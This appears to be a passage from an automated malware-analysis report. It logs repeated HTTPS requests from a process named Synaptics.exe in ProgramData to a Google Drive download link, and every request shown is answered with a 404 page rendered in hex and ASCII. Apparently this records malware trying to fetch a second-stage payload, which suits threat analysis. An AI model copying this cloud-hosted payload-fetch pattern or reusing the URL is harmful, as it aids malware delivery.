                                                                                                                                                                                  2022-05-27 02:38:23 UTC70INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 5a 5a 55 73 66 4b 56 78 63 46 2d 4b 74 56 4e 77 51 39 2d 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jZZUsfKVxcF-KtVNwQ9-lQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:23 UTC71INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:23 UTC71INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  23192.168.2.349767172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:23 UTC68OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:23 UTC71INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-3TPsn48xaQPKkGwymNjxxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:23 UTC73INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 33 49 47 6a 47 4e 4d 75 49 35 41 54 30 32 31 48 64 52 71 48 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X3IGjGNMuI5AT021HdRqHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:23 UTC74INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:23 UTC74INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  24192.168.2.349768172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:23 UTC74OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:23 UTC75INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-2zZqCf538bpNUCHh-XV8Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:23 UTC76INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:23 UTC76INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 32 51 43 6d 4c 6b 42 61 35 55 4d 56 62 42 77 32 5f 33 6e 34 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2QCmLkBa5UMVbBw2_3n4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:23 UTC77INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:23 UTC78INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  25192.168.2.349769172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:23 UTC75OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:23 UTC78INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-xLDmZzE8U_Q17M8WWwO6Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:23 UTC79INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6e 4f 54 61 6e 2d 69 47 78 34 66 53 77 52 38 4b 57 56 44 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UnOTan-iGx4fSwR8KWVDbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:23 UTC81INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:23 UTC81INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  26192.168.2.349771172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:23 UTC78OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:23 UTC81INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-q_WwuXe4XGTluFaUH4GtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:23 UTC82INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:23 UTC82INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 50 35 71 69 72 5a 6a 2d 5a 5a 34 47 4e 5f 4a 59 2d 71 55 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wP5qirZj-ZZ4GN_JY-qUBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:23 UTC83INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:23 UTC84INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  27192.168.2.349772172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:23 UTC81OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:24 UTC84INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-j4jchXbwVQLmIeHkuwST4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:24 UTC85INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
